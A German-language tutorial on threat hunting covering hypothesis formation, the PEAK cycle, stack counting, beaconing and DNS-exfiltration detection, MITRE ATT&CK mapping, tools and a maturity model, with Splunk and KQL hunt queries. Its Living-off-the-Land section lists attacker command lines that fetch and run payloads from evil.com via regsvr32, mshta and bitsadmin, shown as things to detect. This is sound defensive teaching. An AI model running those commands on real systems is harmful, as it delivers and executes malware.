Threat Hunting
Threat Hunting ist die proaktive, hypothesengetriebene Suche nach versteckten Bedrohungen in der eigenen Infrastruktur - bevor Alarme ausgelöst werden. Im Gegensatz zu reaktiven Erkennungsmethoden geht Threat Hunting davon aus, dass Angreifer bereits im Netzwerk sind und sucht aktiv nach Indikatoren ihrer Anwesenheit.
Threat Hunting basiert auf der Annahme: “Assume breach.” Nicht wenn, sondern dass Angreifer bereits im Netzwerk sind. Während SIEM und EDR auf bekannte Signaturen und Regeln reagieren, sucht der Threat Hunter aktiv nach Anomalien, verdächtigen Mustern und Tactics, Techniques & Procedures (TTPs) die keinen Alarm ausgelöst haben - weil der Angreifer unter dem Radar fliegt.
Threat Hunting vs. Incident Response
Reaktive Sicherheit (klassisch):
Alarm → SOC-Analyst → Analyse → Reaktion
Threat Hunting (proaktiv):
Hypothese → Datenabfrage → Analyse → Bedrohung oder Fehlannahme
Hunt-Zyklus (PEAK-Modell):
- Hypothese formulieren (z.B. “Angreifer nutzt Living-off-the-Land-Binaries”)
- Daten sammeln (Logs, EDR-Telemetrie, NetFlow)
- Abfrage / Analyse (SIEM-Queries, Stack-Ranking, Visualisierung)
- Ergebnis: Bedrohung gefunden oder Hypothese verworfen
- Learnings → Neue SIEM-Regeln → Detection Engineering
Threat Hunting schafft Wert AUCH wenn nichts gefunden:
- Bestätigt: Sicherheitskontrollen funktionieren für diesen TTP
- Neue SIEM-Regeln entstehen aus der Hunt-Logik
- Systemwissen wächst (was ist “normal” in dieser Umgebung?)
Hypothesen formulieren - Der Startpunkt jeder Hunt
Hypothesen-Quellen
1. MITRE ATT&CK:
“Angreifer in Finanzunternehmen nutzen häufig T1053.005 (Scheduled Task) für Persistenz”
Hunt: welche Scheduled Tasks wurden kürzlich erstellt? Baseline: welche Tasks sind legitim?
2. Threat Intelligence:
“APT29 (Cozy Bear) nutzt bekanntermaßen: Spear-Phishing mit Word-Makros, Cobalt Strike als C2-Framework, LDAP-Enumeration für AD-Reconnaissance”
Hunt: gab es abnormale LDAP-Queries von Workstations?
3. Anomalie-basiert:
“DNS-Traffic auf unbekannte Domains zwischen 03:00 und 05:00 Uhr” → Mögliches C2-Beacon oder DNS-Exfiltration
4. Crown Jewel Analysis:
“Unsere wertvollsten Daten sind in SharePoint und SAP” → Hunt: wer hat auf diese Daten zugegriffen? Außergewöhnliche Zugriffsmengen?
5. Red Team / Pentest Findings:
“Letzter Pentest: laterale Bewegung über PsExec möglich” → Hunt: gibt es PsExec-Nutzung in den letzten 30 Tagen?
Hypothesen-Template:
“Ich glaube, [Angreifer-Typ] [Technik aus ATT&CK] gegen [unser Asset] nutzt, erkennbar durch [Indicator/Anomalie]“
Threat Hunting Techniken
1. Stack Counting / Frequency Analysis
Häufige Dinge sind meist legitim, seltene können verdächtig sein.
Beispiel: Parent-Child-Process-Analyse
// KQL (Kusto Query Language, Microsoft Sentinel):
DeviceProcessEvents
| summarize count() by ParentProcessName, ProcessCommandLine
| where count_ < 5 // Seltene Kombinationen
| where ProcessCommandLine contains "powershell" or
ProcessCommandLine contains "cmd.exe"
| order by count_ ascBefund: winword.exe → powershell.exe (Word startet PowerShell?) → Verdächtig! Mögliches Makro-Execution
2. Long-Tail-Analyse (was macht der seltenste X?)
// Splunk:
index=windows EventCode=4688
| stats count by ParentProcessName, NewProcessName
| sort count asc
| head 20Welche Prozess-Kombinationen kommen nur 1-2 mal vor? Sind diese legitimiert (Admin-Tool) oder verdächtig?
3. Network Baseline und Abweichungen
Suricata / Zeek + ELK:
- Welche internen Hosts haben Outbound-Traffic zu seltenen Ländern?
- DNS-Anfragen: Domains mit hoher Entropie (DGA-Domains)?
- Beaconing: periodischer Traffic in gleichen Intervallen?
Beaconing-Erkennung (Logik):
Für jede Source-IP → Dest-IP Kombination: Intervall zwischen Verbindungen berechnen. Wenn Standardabweichung < 10% des Mittelwerts → verdächtiges Beaconing!
4. Living-off-the-Land (LotL) Erkennung
Angreifer nutzen Windows-Bordmittel um AV zu umgehen:
powershell.exe -enc <Base64> :: Encoded Command
certutil.exe -decode malware.b64 output :: Datei-Download
regsvr32.exe /s /n /u /i:http://evil.com :: COM-Hijack
mshta.exe http://evil.com/script.hta :: Remote HTA
wmic process call create "payload.exe" :: WMI Process Launch
bitsadmin.exe /transfer malware http://evil.com/m.exe %temp%\m.exe// Splunk Hunt:
index=windows EventCode=4688
| search NewProcessName IN ("certutil.exe", "bitsadmin.exe", "mshta.exe")
| table _time, ComputerName, ParentProcessName, CommandLine5. Kerberoasting-Hunt (Active Directory)
Angreifer fordern Service Tickets an und cracken Hashes offline.
// Event ID 4769 (Kerberos Service Ticket Requested):
index=windows EventCode=4769
| where TicketEncryptionType="0x17" // RC4-Encryption (schwach!)
| stats count by TargetUserName, ServiceName, IpAddress
| where count > 10 // Viele Anfragen = verdächtig6. DNS-Exfiltration Hunt
Angreifer tunneln Daten über DNS-Queries.
# Zeek-Log-Analyse:
cat dns.log | awk '{print length($9), $9}' | sort -rn | head 20
# Lange DNS-Queries? > 50 Zeichen Subdomain?# Python-Analyse:
import dns_log
for query in dns_queries:
subdomain = query.domain.split('.')[0]
if len(subdomain) > 40: # Langer Subdomain-Teil
entropy = calculate_entropy(subdomain)
if entropy > 3.5: # Hohe Entropie → base64/hex
flag_as_suspicious(query)Threat Hunting Tools
SIEM-Plattformen
| Plattform | Besonderheiten |
|---|---|
| Microsoft Sentinel | KQL, Jupyter Notebooks, MITRE ATT&CK Integration |
| Splunk SIEM | SPL-Queries, Phantom SOAR Integration |
| Elastic SIEM | EQL (Event Query Language), Kibana |
| QRadar | AQL, MITRE ATT&CK Mapping |
EDR-Plattformen (für Endpoint-Telemetrie)
| Plattform | Besonderheiten |
|---|---|
| CrowdStrike Falcon | Threat Graph, RTR (Remote Response) |
| Microsoft Defender | Advanced Hunting (KQL), MDE-Logs |
| SentinelOne | Deep Visibility, Story-basierte Analyse |
| Carbon Black | Live Query, Process Trees |
Spezialisierte Tools
| Tool | Funktion |
|---|---|
| Zeek (Bro) | Netzwerk-Traffic-Analyse, Protokoll-Logs |
| RITA | Erkennung von Beaconing, C2-Kommunikation |
| Velociraptor | Endpoint-Forensik, Hunting at Scale |
| OSQuery | SQL-ähnliche Endpoint-Abfragen |
| Hayabusa | Schnelle Windows Event Log-Analyse (Rust) |
| Chainsaw | Windows Eventlog-Hunting |
| yarGen / YARA | Malware-Hunting mit YARA-Regeln |
MITRE ATT&CK als Hunting-Framework
ATT&CK-Kategorien für systematisches Hunting
| Kategorie | Hunt-Fokus |
|---|---|
| Reconnaissance (T1590-T1598) | Suspicious DNS lookups gegen interne Systeme; Port-Scanning von internen Hosts |
| Initial Access (T1566-T1199) | Phishing-Anhänge (Office-Makros, ISO-Files); VPN-Logins von ungewöhnlichen GeoLocations |
| Execution (T1059) | PowerShell mit Encoded Commands; WMI-Remote-Execution |
| Persistence (T1053, T1547) | Neue Scheduled Tasks; Registry-Run-Keys |
| Privilege Escalation (T1548, T1134) | UAC-Bypass-Techniken; Token-Impersonation |
| Defense Evasion (T1562, T1070) | Event-Log-Löschung (EventCode 1102); Antivirus-Deaktivierung |
| Credential Access (T1003, T1558) | LSASS-Zugriffe (Mimikatz); Kerberoasting (EventCode 4769) |
| Lateral Movement (T1021) | PsExec-Nutzung; WinRM von ungewöhnlichen Hosts |
| Exfiltration (T1041, T1048) | Große Datenmengen via HTTPS nach außen; DNS-Tunneling |
ATT&CK-Hunt-Priorisierung:
- Welche Techniken sind für unsere Branche am häufigsten? (CISA-Alerts)
- Welche haben wir noch nicht gedeckt? (Coverage-Matrix)
- Welche haben hohen Impact bei geringen Detektionschancen?
Threat Hunting Maturity Model
Level 0 - Reactive
- Nur Alarm-basierte Reaktion
- Kein proaktives Hunting
- Viele SIEM-Alarme, wenig Kontext
Level 1 - Minimal
- IOC-basiertes Hunting (IP-/Domain-/Hash-Listen)
- Threat-Intel-Feeds werden abgeglichen
- Noch kein hypothesenbasiertes Hunting
Level 2 - Procedural
- Hypothesen aus ATT&CK
- Standardisierte Hunt-Playbooks
- Detection Engineering aus Hunt-Ergebnissen
Level 3 - Innovative
- Machine Learning für Anomalie-Erkennung
- Custom-Datenquellen (Honeypots, Deception)
- Hunting-Ergebnisse fließen in Red-Team-Szenarien
Level 4 - Leading
- Automatisiertes Hunting (SOAR-gestützt)
- Crowdsourced Threat Intelligence
- Kontinuierliche Hunt-Programme mit KPIs
- Threat-Intel-Sharing mit Branchen-Partners (ISACs)
